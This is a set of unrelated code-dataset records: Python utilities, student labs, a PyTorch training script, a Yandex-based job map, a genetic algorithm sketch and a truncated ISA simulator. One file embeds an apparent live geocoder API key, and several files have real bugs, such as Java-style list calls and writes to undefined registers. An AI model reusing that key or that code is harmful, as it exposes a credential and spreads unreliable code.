signal.setitimer(signal.ITIMER_REAL,1,0.05)\n\ndef destory():\n \"\"\" heartbeat清理方法\n 应在应用程序结束时调用一次\n \"\"\"\n global shutdown,objset\n shutdown = True\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n\ndef call_out(delay,func,*args,**kws):\n \"\"\" call_out延迟调用\n 用法heartbeat.call_out(3,func)或者call_out(2,func,3,4,5)或者call_out(4,func,2,a='1')\n \"\"\"\n callout_obj = CallOut(delay,func,*args,**kws)\n callout_set.add(callout_obj)\n return callout_obj\n\ndef remove_call_out(callout_obj):\n callout_set.remove(callout_obj)\n\ndef call_out_size():\n \"\"\" 获取延迟调用的个数\n \"\"\"\n return len(callout_set)\n\ndef _register(obj):\n \"\"\" 注册一个心跳对象,心跳模块内部使用\n \"\"\"\n objset.add(obj)\n\ndef _remove(obj):\n \"\"\" 移除掉一个已经注册过的心跳对象,心跳模块内部使用\n \"\"\"\n try:\n if beating:\n remove_set.add(obj)\n else:\n objset.remove(obj)\n return True\n except KeyError:\n return False\n\ndef get_obj_count():\n \"\"\" 获取心跳tick为某个值的对象个数\n \"\"\"\n return len(objset)\n\ndef _set_hb_flag(sig,frame):\n \"\"\"闹钟到时,设置心跳标志\"\"\"\n global hb_flag\n # if hb_flag:\n # logging.warn(\"pre heartbeat don't be called\")\n hb_flag = True\n\ndef check_beat():\n \"\"\" 心跳跳动,心跳模块内部使用\n \"\"\"\n if is_open_cpu_profiler:\n profiler.enable()\n start_s = time()\n network.add_ioloop_callback(check_beat)\n global hb_flag\n scheduler_manager.check()\n if shutdown:\n return\n elif hb_flag:\n hb_flag = False\n global beating, objset\n beating = True\n for obj in copy(objset):\n obj._beat()\n beating = False\n if remove_set:\n objset = objset - remove_set\n remove_set.clear()\n for callout in copy(callout_set):\n callout._beat()\n if not callout.valid():\n callout_set.remove(callout)\n if is_open_cpu_profiler:\n end_s = time()\n cost_ms = (end_s - start_s) * 1000\n if cost_ms > 
10:\n            profiler.dump_stats(\"logs/hb-%s-%s.prof\" % (round(cost_ms,0),rand_str(4)))\n            profiler.clear()\n\nclass HeartBeat(object):\n    \"\"\" The heartbeat class.\n    A class whose objects need heartbeat behaviour should inherit from this class.\n    Call set_heart_beat(tick) to choose how many ticks pass between heartbeats.\n    Override heart_beat(self) to define what happens when the heartbeat fires.\n    An object that does not need a heartbeat simply never calls set_heart_beat().\n    When removing an object that still has a heartbeat, call set_heart_beat(0) to\n    cancel it; the heartbeat module then drops its reference to the object so it\n    can be garbage collected.\n    \"\"\"\n\n    def heart_beat(self):\n        \"\"\" The heartbeat logic; subclasses should override this method.\n        \"\"\"\n        logging.debug(\"the default behaviour of heart_beat action\")\n\n    def _beat(self):\n        self._curtick -= 1\n        if not self._curtick:\n            self._curtick = self._tick\n            try:\n                self.heart_beat()\n            except Exception as e:\n                logging.warn(\"caught exception %s in heartbeat\",e,exc_info = True)\n\n    def set_heart_beat(self,tick,imm = False, left_tick = None):\n        \"\"\" Set the heartbeat interval; the argument is an integer.\n        imm : fire one heartbeat immediately\n        left_tick: fire the next heartbeat after this many ticks\n        \"\"\"\n        if tick == 0:\n            _remove(self)\n            # try:\n            #     logging.info(\"remove _tick value\")\n            # except AttributeError:\n            #     logging.warn(\"remove _tick failed\")\n        else:\n            self._tick = tick\n            if imm:\n                self._curtick = 1\n            elif left_tick:\n                self._curtick = left_tick\n            else:\n                self._curtick = tick\n            _register(self)\n\nclass CallOut(object):\n    def __init__(self,delay,func,*args,**kws):\n        if args or kws:\n            func = functools.partial(func,*args,**kws)\n        self._func = func\n        self._curtick = delay * 20\n\n    def _beat(self):\n        self._curtick -= 1\n        if not self._curtick:\n            try:\n                self._func()\n            except:\n                logging.warn(\"exception when executing callout\", exc_info = True)\n\n    def valid(self):\n        return self._curtick > 0\n","sub_path":"yuanneng/core/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"204583936","text":"from search import *\nimport collections\n\n\nclass BFSFrontier(Frontier):\n    \"\"\"Implements a frontier container appropriate for breadth-first\n    search.\"\"\"\n\n    def __init__(self):\n        \"\"\"The constructor takes no argument. It initialises the\n        container to an empty FIFO queue.\"\"\"\n        self.container = collections.deque()\n\n    def add(self, path):\n        self.container.append(path)\n\n    def __iter__(self):\n        \"\"\"The object returns itself because it is implementing a __next__\n        method and does not need any additional state for iteration.\"\"\"\n        return self\n\n    def __next__(self):\n        if len(self.container) > 0:\n            return self.container.popleft()\n        else:\n            raise StopIteration  # don't change this one\n\n\n\nfrom search import *\n\n\ngraph = ExplicitGraph(nodes=set('SAG'),\n                      edge_list = [('S','A'), ('S', 'G'), ('A', 'G')],\n                      starting_nodes = ['S'],\n                      goal_nodes = {'G'})\n\nsolutions = generic_search(graph, BFSFrontier())\nsolution = next(solutions, None)\nprint_actions(solution)\n\n\nfrom search import *\n\n\nflights = ExplicitGraph(nodes=['Christchurch', 'Auckland', \n                               'Wellington', 'Gold Coast'],\n                        edge_list = [('Christchurch', 'Gold Coast'),\n                                     ('Christchurch','Auckland'),\n                                     ('Christchurch','Wellington'),\n                                     ('Wellington', 'Gold Coast'),\n                                     ('Wellington', 'Auckland'),\n                                     ('Auckland', 'Gold Coast')],\n                        starting_nodes = ['Christchurch'],\n                        goal_nodes = {'Gold Coast'})\n\nmy_itinerary = next(generic_search(flights, BFSFrontier()), None)\nprint_actions(my_itinerary)","sub_path":"Lab 2/bfs-frontier.py","file_name":"bfs-frontier.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286817636","text":"# Insert:\r\ndef insertList():\r\n    or_list = [1, \"abc\", 2.51]\r\n    or_list.append(\"JavaScript\")  # append() adds an element at the end of the list (as a single item)\r\n    or_list.insert(0, \"Python\")\r\n    print(\"or_list is: \", or_list)\r\n# insert() adds an element to the list. insert() takes the position and the new content; the new element lands just before the element currently at that position. If the position does not exist, the element is appended at the end by default.\r\n    or_list = [1, \"abc\", 2.51]\r\n    or_list[0:0] = [9]  # [0:0] inserts the new element at position 1 of the list\r\n    or_list[3:3] = \"a\"  # [3:3] inserts the new element at position 4 of the list\r\n    print(\"or_list is: \", or_list)\r\n\r\n# Both ways above add a single element; to add several elements at once, use extend():\r\n    or_list = [1, \"abc\", 2.51]\r\n    ex_list = [\"Python\", 23, \"game\"]\r\n    or_list.extend(ex_list)  # extend() appends all the values of another list at the end in one go\r\n    print(\"or_list is: \", or_list)\r\n\r\n# Delete:\r\ndef deleteList():\r\n    or_list = [1, \"abc\", 2.51]\r\n    or_list.remove(1)\r\n    print(\"or_list is: \", or_list)\r\n    or_list.pop()  # remove the last element\r\n    print(\"or_list is: \", or_list)\r\n    # Besides remove(), list elements can also be deleted with the del keyword:\r\n    del or_list[0:2]  # [0:2] deletes the elements at positions 1 and 2\r\n    print(\"or_list is: \", or_list)\r\n\r\n# Update:\r\ndef updateList():\r\n    lst = [1, \"abc\", 2.51]\r\n    lst[0] = \"start\"\r\n    lst[2] = 777\r\n    print(\"lst is: \", lst)\r\n    # To replace an element of the list, assign to that position directly; lst[2] is the 3rd element of lst.\r\n\r\n# Search:\r\ndef searchList():\r\n    # List indexing works like string indexing: it can run forwards or backwards, e.g.:\r\n    src_list = [1, \"abc\", 2.51]\r\n    # print the element at position 2 and the last element\r\n    print(src_list[1], src_list[-1])\r\n\r\n    # print elements 1 and 2, then elements 2 through the end\r\n    print(src_list[:2], src_list[1:])\r\n    # To look up the position of an element, use this instead:\r\n    src_list = [1, \"abc\", 2.5, 360]\r\n    print(src_list.index(2.5))\r\n    # Note: if the element passed to index() is not in the list, the program raises ValueError: \"xxx\" is not in list\r\n\r\n# Other:\r\ndef func(a, b):\r\n    return True if a > b else False\r\n\r\ndef sortList():\r\n    '''\r\n    list.sort(cmp=None, key=None, reverse=False)\r\n    cmp -- optional; if given, sorting uses this comparison function.\r\n    key -- the element used for comparison; a one-argument function whose argument is taken from the iterable, picking the part of each item to sort by.\r\n    reverse -- sort order, reverse = True descending, reverse = False 
ascending (default).\r\n    '''\r\n    src_list = [1, 7, 2, 5, 4, 6, 3]\r\n    src_list.sort()  # sort in place\r\n    print(src_list)\r\n    src_list = [1, 7, 2, 5, 4, 6, 3]\r\n    src_list.sort(reverse=True)\r\n    print(src_list)\r\n\r\ndef otherListOperate():\r\n    #src_list = [1, \"abc\", 2.51]\r\n    src_list = [1, 7, 2, 5, 4, 6, 3]\r\n    src_list.reverse()  # reverse in place\r\n    print(src_list)\r\n    \r\n\r\n# operators: + - in for\r\ndef main():\r\n    #insertList()\r\n    #deleteList()\r\n    #updateList()\r\n    #searchList()\r\n    sortList()\r\n    #otherListOperate()\r\n\r\nif __name__ == '__main__':\r\n    main()","sub_path":"Day16-20/Day16/code/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"155530951","text":"from tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\n\nimport argparse\nimport subprocess\nimport datetime\nimport yaml\nfrom shutil import copyfile\nimport os\nimport shutil\nimport __init__ as booger\n\nimport torch\nfrom torchvision import models\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\n\nimport sys\nsys.path.append('../')\nfrom common import trainer_mod\nfrom common import make_datalist_mod\nfrom common import data_transform_mod\nfrom common import dataset_mod\nfrom common import dnn_network\n\n\nif __name__ == '__main__':\n    \n    parser = argparse.ArgumentParser(\"./train.py\")\n\n    parser.add_argument(\n        '--train_cfg', '-c',\n        type=str,\n        required=False,\n        default='/home/ros_catkin_ws/src/dnn_attitude_predictor_with_image/config/train_config.yaml',\n        help='Train hyperparameter config file',\n    )\n\n    FLAGS, unparsed = parser.parse_known_args()\n\n    #load yaml file\n    try:\n        print(\"Opening train config file %s\", FLAGS.train_cfg)\n        CFG = yaml.safe_load(open(FLAGS.train_cfg, 'r'))\n    except Exception as e:\n        print(e)\n        print(\"Error opening train config file %s\", FLAGS.train_cfg)\n        quit()\n\n    #get file paths\n    method_name = CFG[\"method_name\"]\n    dataset_top_path = CFG[\"dataset_top_path\"]\n    experiment_type = CFG[\"experiment_type\"]\n    image_env = CFG[\"image_env\"]\n    train_sequences = CFG[\"train\"] #string\n    valid_sequences = CFG[\"valid\"]\n    csv_name = CFG[\"csv_name\"]\n    weights_path = CFG[\"weights_path\"]\n    log_path = CFG[\"log_path\"]\n    graph_path = CFG[\"graph_path\"]\n\n    #get train and valid root path\n    list_train_rootpaths = []\n    list_valid_rootpaths = []\n\n    for i in train_sequences:\n        tmp_path = dataset_top_path + experiment_type + image_env + i\n        list_train_rootpaths.append(tmp_path)\n    \n    for i in valid_sequences:\n        tmp_path = dataset_top_path + experiment_type + image_env + i\n        list_valid_rootpaths.append(tmp_path)\n\n    #get hyperparameter for learning\n    resize = CFG[\"hyperparameter\"][\"resize\"]\n    mean_element = CFG[\"hyperparameter\"][\"mean_element\"]\n    std_element = CFG[\"hyperparameter\"][\"std_element\"]\n    hor_fov_deg = CFG[\"hyperparameter\"][\"hor_fov_deg\"]\n    optimizer_name = CFG[\"hyperparameter\"][\"optimizer_name\"]\n    lr_cnn = float(CFG[\"hyperparameter\"][\"lr_cnn\"])\n    lr_fc = float(CFG[\"hyperparameter\"][\"lr_fc\"])\n    batch_size = CFG[\"hyperparameter\"][\"batch_size\"]\n    num_epochs = CFG[\"hyperparameter\"][\"num_epochs\"]\n\n    try:\n        print(\"Copy files to %s for further reference.\" % log_path)\n        copyfile(FLAGS.train_cfg, log_path + \"/train_config.yaml\")\n    except Exception as e:\n        print(e)\n        print(\"Error copying files, check permissions. 
Exiting....\")\n        quit()\n\n    ##Get train and valid dataset\n    train_dataset = dataset_mod.Originaldataset(\n        data_list = make_datalist_mod.makeMultiDataList(list_train_rootpaths, csv_name),\n        transform = data_transform_mod.DataTransform(\n            resize,\n            ([mean_element, mean_element, mean_element]),\n            ([std_element, std_element, std_element]),\n            hor_fov_deg = hor_fov_deg\n        ),\n        phase = \"train\"\n    )\n\n    valid_dataset = dataset_mod.Originaldataset(\n        data_list = make_datalist_mod.makeMultiDataList(list_valid_rootpaths, csv_name),\n        transform = data_transform_mod.DataTransform(\n            resize,\n            ([mean_element, mean_element, mean_element]),\n            ([std_element, std_element, std_element]),\n            hor_fov_deg = hor_fov_deg\n        ),\n        phase = \"valid\"\n    )\n\n    ##Network\n    net = dnn_network.Network(resize, dim_fc_out=3, dropout_rate=0.1, use_pretrained_vgg=True)\n\n\n    ##Criterion\n    criterion = nn.MSELoss()\n\n    #train\n    trainer = trainer_mod.Trainer(\n        method_name,\n        train_dataset,\n        valid_dataset,\n        net,\n        criterion,\n        optimizer_name,\n        lr_cnn,\n        lr_fc,\n        batch_size,\n        num_epochs,\n        weights_path,\n        log_path,\n        graph_path\n    )\n\n    trainer.train()\n","sub_path":"pysrc/regression/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375603933","text":"import datetime\nimport re\n\nfrom .exceptions import ObjectIsNotADate\n\n\ndef format_date(value, format=\"%d %m %Y\"):\n    regex = re.match(r\"(?P<year>\\d{4})-(?P<month>\\d{2})-(?P<day>\\d{2})\", value)\n    if regex is not None:\n        date = datetime.date(\n            int(regex.group(\"year\")),\n            int(regex.group(\"month\")),\n            int(regex.group(\"day\")))\n    else:\n        raise ObjectIsNotADate\n\n    return date.strftime(format)\n","sub_path":"jsonresume_theme_stackoverflow/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"387480936","text":"#!/usr/bin/env python3\n# -*-encoding: utf-8-*-\n\n# Fields from the REVENUE table that will be shown in the GUI\nREVENUE_FIELDS = ('id', 'Date', 'Sum', 'Category', 'Comments')\n\n# Fields from the COST table that will be shown in the GUI\nCOSTS_FIELDS = ('id', 'Date', 'Sum', 'Category', 'Comments')\n\n# Default number of items a search will return\nDEFAULT_N = 40\n\n# Constant meaning the 'Income' transaction type. Matches the name of the revenues table\nREVENUE = 'Revenues'\n\n# Constant meaning the 'Expense' transaction type. Matches the name of the costs table\nCOST = 'Costs'\n\n# default path to the database\nDEFAULT_DATABASE = './budget.db'\n\n\ndef name_dict(dicts_list) -> dict:\n    \"\"\" Build a {Name: id} dict from a list of dicts\n    (rows coming from the database).\n\n    :param dicts_list: [dict('field1': 'val1' ... ), dict('field1': 'val1' ... )]\n    :return: dict(Name1: id1, Name2: id2)\n    \"\"\"\n    res = {}\n    for el in dicts_list:\n        res[el['Name']] = el['id']\n    return res\n\n\ndef id_dict(dicts_list):\n    \"\"\" Build an {id: Name} dict from a list of dicts\n    (rows coming from the database).\n\n    :param dicts_list: [dict('field1': 'val1' ... ), dict('field1': 'val1' ... )]\n    :return: dict(id1: Name1, id2: Name2)\n    \"\"\"\n    res = {}\n    for el in dicts_list:\n        res[el['id']] = el['Name']\n    return res\n","sub_path":"math_projects/dana_sira/structure/other_functions.py","file_name":"other_functions.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"158147908","text":"'''\nYou are given a partial sample of the dataset of recorded crimes committed in the city of Chicago\nfrom 2001 to the present.\nOne of a crime's attributes is its type - Primary Type.\nYou need to find the crime type that was recorded the greatest\nnumber of times in 2015.\nData file:\nCrimes.csv\n'''\n\nimport csv\nimport re\nfrom collections import Counter\n\nPrimary_Type = []\n\n# via a regular expression\nwith open(r'A:\\Crimes.csv') as r:\n    reader = csv.reader(r)\n    for row in reader:\n        result = re.findall(r'\\d{2}\\/\\d{2}\\/2015', str(row))\n        if result:\n            Primary_Type.append(row[5])\n\n# # via substring search in a list element\n# with open(r'A:\\Crimes.csv') as r:\n#     reader = csv.reader(r)\n#     for row in reader:\n#         if '2015' in row[2]:\n#             Primary_Type.append(row[5])\n\nprint(Counter(Primary_Type).most_common(1))\n","sub_path":"Python основы и применение/csv(поиск количества преступлений).py","file_name":"csv(поиск количества преступлений).py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"67381013","text":"import requests\nfrom data import db_session\nfrom data.jobs import Jobs\n\n\ndef show():\n    db_session.global_init(\"db/jobs.db\")\n    session = db_session.create_session()\n    points = session.query(Jobs.coords, Jobs.id, Jobs.is_finished).all()\n    ids = [el[1] for el in points if el[2] == False]\n    points = [el[0] for el in points if el[2] == False]\n    points = [f'{points[i].split()[0]},{points[i].split()[1]},pm2ywl{ids[i]}' for i in range(len(points))]\n    map_request = f\"http://static-maps.yandex.ru/1.x/?&l=map&pt={'~'.join(points)}\"\n    response = requests.get(map_request)\n    map_file = 'static/img/map.png'\n    if response:\n        with open(map_file, \"wb\") as file:\n            file.write(response.content)\n    return map_file\n\n\ndef sort_address_jobs(address):\n    try:\n        db_session.global_init(\"db/jobs.db\")\n        session = db_session.create_session()\n        jobs = session.query(Jobs).all()\n\n        geocoder_api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n        geocoder_params = {\n            \"apikey\": \"40d1649f-0493-4b70-98ba-98533de7710b\",\n            \"geocode\": address,\n            \"format\": \"json\"}\n        response = requests.get(geocoder_api_server, params=geocoder_params)\n        if response:\n            json_response = response.json()\n            toponym = json_response[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n            coodrinates = toponym[\"Point\"][\"pos\"]\n\n        sp = [(job, ((float(job.coords.split()[0]) - float(coodrinates.split()[0])) ** 2 + (\n            float(job.coords.split()[1]) - float(coodrinates.split()[1])) ** 2) ** 0.5) for job in jobs]\n        return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n    except:\n        return None\n\n\ndef sort_salary_jobs(position):\n    try:\n        db_session.global_init(\"db/jobs.db\")\n        session = db_session.create_session()\n        jobs = session.query(Jobs).all()\n        sp = [(job, job.salary) for job in jobs]\n        if position == 'up':\n            return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n        return [el[0] for el in sorted(sp, key=lambda x: x[1])][::-1]\n    except:\n        return None\n\n\ndef sort_date_jobs(position):\n    try:\n        
db_session.global_init(\"db/jobs.db\")\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n sp = [(job, job.id) for job in jobs]\n if position == 'up':\n return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n return [el[0] for el in sorted(sp, key=lambda x: x[1])][::-1]\n except:\n return None\n","sub_path":"data/show_map.py","file_name":"show_map.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"82153220","text":"import math\nfrom NeuralNetwork import *\n\nclass Genome:\n def __init__(self):\n\n #contains connectionGene\n self.genes = []\n #contains Node\n self.nodes = []\n\n #(int)quantity of both\n self.inputs = 3\n self.outputs = 3\n \n #(int)\n self.layers = 2\n self.nextNode = 0\n\n #contains Nodes\n self.network = []\n\n #Create input nodes\n #might be wrong\n for i in range(self.inputs):\n self.nodes.append(Node(i))\n self.nextNode += 1\n self.nodes[i].layer = 0\n \n #Create output nodes\n for i in range(self.outputs):\n self.nodes.append(Node(i + self.inputs))\n self.nodes[i].layer = 1\n self.nextNode += 1;\n\n #initialize the bias node once established\n self.nodes.append(Node(self.nextNode))\n self.biasNode = self.nextNode\n self.nextNode += 1\n self.nodes[self.biasNode].layer = 0\n \n def getNode(self, nodeNumber):\n for node in self.nodes:\n if node.number == nodeNumber:\n return node\n return null\n \n def connectNodes(self):\n \"\"\"adds the conenctions going out of a node to that node so that it can acess the next node during feeding forward \"\"\"\n #clear all of the nodes\n for node in self.nodes:\n #unsure if clear will work\n node.outputConnections.clear()\n \n for gene in self.genes:\n gene.fromNode.outputConnections.append(gene)\n \n def feedForward(self, inputValues):\n \"\"\"feeding in input values into the NN and returning output array\"\"\"\n for i in range(self.inputs):\n self.nodes[i].outputValue = inputValues[i]\n self.nodes[self.biasNode].outputValue = 1\n\n for node in self.network:\n node.engage()\n \n outs = []\n # for output in self.outputs:\n #make sure (int)output is giving the correct sequential output\n #outs[output] = (float)self.nodes[self.inputs + output].outputValue #<- This line is wronk\n \n for node in self.nodes:\n node.inputSum = 0\n return outs\n \n def generateNetwork(self):\n \"\"\" sets up the NN as a list of nodes in order to be engaged \"\"\"\n self.connectNodes()\n network = []\n for lay in range(self.layers):\n for node in self.nodes:\n if node.layer == lay:\n network.append(node)\n\n def addNode(self, innovationHistory):\n if self.genes.size() == 0:\n addConnection(innovationHistory)\n return\n randomConnection = math.floor(random(len(self.genes)))\n\n while self.genes.get(randomConnection).fromNode == nodes.get(biasNode) and self.genes.size() > 1:\n randomConnection = math.floor(random(len(self.genes)))\n\n self.genes.get(randomConnection).enabled = false\n\n newNodeNo = nextNode\n nodes.add(newNodeNo)\n nextNode = nextNode + 1\n\n connectionInnovationNumber = getInnovationNumber(innovationHistory, self.genes.get(randomConnection).fromNode, getNode(newNodeNo))\n #add a new connection from the new node with a weight the same as the disabled connection\n self.genes.add(connectionGene(getNode(newNodeNo), self.genes.get(randomConnection).toNode, genes.get(randomConnection).weight, connectionInnovationNumber))\n getNode(newNodeNo).layer = self.genes.get(randomConnection).fromNode.layer + 1\n\n 
connectionInnovationNumber = getInnovationNumber(innovationHistory, nodes.get(biasNode), getNode(newNodeNo))\n #Connect the bias to the new node with a weight of 0\n self.genes.add(connectionGene(self.nodes.get(biasNode), getNode(newNodeNo), 0, connectionInnovationNumber))\n\n #If the layer of the new node is equal to the layer of the output node of the old connection then a new layer needs to be created\n #more accurately the layer numbers of all layers equal to or greater than this new node need to be incrimented\n if (getNode(newNodeNo).layer == self.genes.get(randomConnection).toNode.layer):\n for i in self.nodes: #dont include this newest node\n if (i.layer >= getNode(newNodeNo).layer):\n i.layer = i.layer + 1;\n layers = layers + 1;\n connectNodes();\n\n def mutate(self, innovationHistory):\n if self.genes.size() == 0:\n addConnection(innovationHistory)\n randomNum1 = randrange(1, 10)\n randomNum1 = 1.0/randomNum\n if randomNum1 < 0.8:\n for i in self.genes:\n i.mutateWeight()\n\n randomNum2 = randrange(1,10)\n randomNum2 = 0.5/randomNum2\n if randomNum2 < 0.05:\n addConnection(innovationHistory)\n\n randomNum3 = randrange(1,10)\n randomNum3 = 0.1/randomNum3\n if randomNum3 < 0.01:\n addNode(innovationHistory)\n","sub_path":"Project/Rebecca/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"586929292","text":"import matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nX=[]\r\nY=[]\r\ndef plot( x_dim, y_dim):\r\n '''\r\n x_dim and y_dim should be such that both the figures are visible inside the plot\r\n '''\r\n x_dim, y_dim = 1.2 * x_dim, 1.2 * y_dim\r\n plt.plot((0, x_dim), [0, 0], 'k-')\r\n plt.plot([0, 0], (0, y_dim), 'k-')\r\n plt.xlim(0, x_dim)\r\n plt.ylim(0, y_dim)\r\n plt.xlabel(\"Cycle number\")\r\n plt.ylabel(\"Accessed memory address\")\r\n plt.grid()\r\n sams=\"CO\"+str(len(X))+\".png\"\r\n plt.savefig(sams)\r\n plt.show()\r\ndef Pd():\r\n plt.scatter(X,Y,c=\"blue\")\r\n plot(max(X),max(Y))\r\n\r\ndef convert1(a):\r\n # convert integer to 16 bit binary\r\n bnr = bin(a).replace('0b', '')\r\n x = bnr[::-1] # this reverses an array\r\n while len(x) < 16:\r\n x += '0'\r\n bnr = x[::-1]\r\n return bnr\r\n\r\n\r\ndef convert(a):\r\n # convert integer to 8 bit binary\r\n bnr = bin(a).replace('0b', '')\r\n x = bnr[::-1] # this reverses an array\r\n while len(x) < 8:\r\n x += '0'\r\n bnr = x[::-1]\r\n return bnr\r\nstatements = {}\r\nvar = 0\r\npc =\"00000000\"\r\nreg = {'000': \"0000000000000000\",\r\n '001': \"0000000000000000\",\r\n '010': \"0000000000000000\",\r\n '011': \"0000000000000000\",\r\n '100': \"0000000000000000\",\r\n '101': \"0000000000000000\",\r\n '110': \"0000000000000000\",\r\n '111': \"0000000000000000\"}\r\nwhile (1):\r\n try:\r\n line = input()\r\n if(line!=\"\"):\r\n statements[convert(var)] = line\r\n var += 1\r\n except EOFError:\r\n break\r\nMEM = statements.copy()\r\nmlen = len(MEM)\r\nwhile (mlen <= 255):\r\n MEM[convert(mlen)] = \"0000000000000000\"\r\n mlen+=1\r\ndef mov1(l,pc):\r\n reg[\"111\"]=\"0000000000000000\"\r\n reg[l[5:8]]=convert1(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\n\r\ndef mov2(l,pc):\r\n reg[l[10:13]]=convert1(int(reg[l[13:]],2))\r\n reg[\"111\"]=\"0000000000000000\"\r\n return convert(int(pc,2)+1)\r\n\r\n\r\ndef add(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 + n2)\r\n y = bin(x)\r\n if len(y) > 
18:\r\n reg[l[7:10]] = y[-16:]\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc, 2) + 1)\r\n\r\ndef sub(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 - n2)\r\n if x < 0:\r\n reg[l[7:10]] =\"0000000000000000\"\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc,2)+1)\r\n\r\ndef mul(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 * n2)\r\n y = bin(x)\r\n if len(y) > 18:\r\n reg[l[7:10]]=y[-16:]\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc,2)+1)\r\n\r\ndef div(l,pc):\r\n reg[\"111\"]=\"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 // n2)\r\n y = n1 % n2\r\n x = convert1(x)\r\n y = convert1(y)\r\n reg[\"R0\"]=x\r\n reg[\"R1\"]=y\r\n return convert(int(pc,2)+1)\r\n\r\ndef left_shift(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n x = int(reg[l[5:8]], 2) << int(l[8:], 2)\r\n x = convert1(x)\r\n if (len(x) > 16):\r\n reg['111'] = (bin(int(reg['111'], 2) + 8))[2:]\r\n else:\r\n reg[l[5:8]] = x\r\n return convert(int(pc,2)+1)\r\n\r\ndef right_shift(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n x = int(reg[l[5:8]], 2) >> int(l[8:], 2)\r\n x = convert1(x)\r\n reg[l[5:8]] = x\r\n return convert(int(pc,2)+1)\r\n\r\ndef xor_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) ^ int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef or_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) | int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef and_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) & int(reg[l[13:]], 2))\r\n\r\n return convert(int(pc,2)+1)\r\ndef not_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[10:13]] = convert1(~int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef load(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[5:8]] = MEM[l[8:]]\r\n X.append(X[-1])\r\n Y.append(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef store(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n MEM[l[8:]] = reg[l[5:8]]\r\n X.append(X[-1])\r\n Y.append(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef compare(l,pc):\r\n\r\n reg['111'] = '0000000000000000'\r\n if int(reg[l[10:13]], 2) == int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 1)\r\n elif int(reg[l[10:13]], 2) > int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 2)\r\n elif int(reg[l[10:13]], 2) < int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 4)\r\n return convert(int(pc,2)+1)\r\n\r\ndef jump_uncond(l,pc):\r\n return l[8:]\r\ndef jump_if_less(l,pc):\r\n if (reg['111'][-3] == '1'):\r\n return l[8:]\r\n else:\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef jump_if_greater(l,pc):\r\n if (reg['111'][-2] == '1'):\r\n return l[8:]\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef jump_if_equal(l,pc):\r\n if 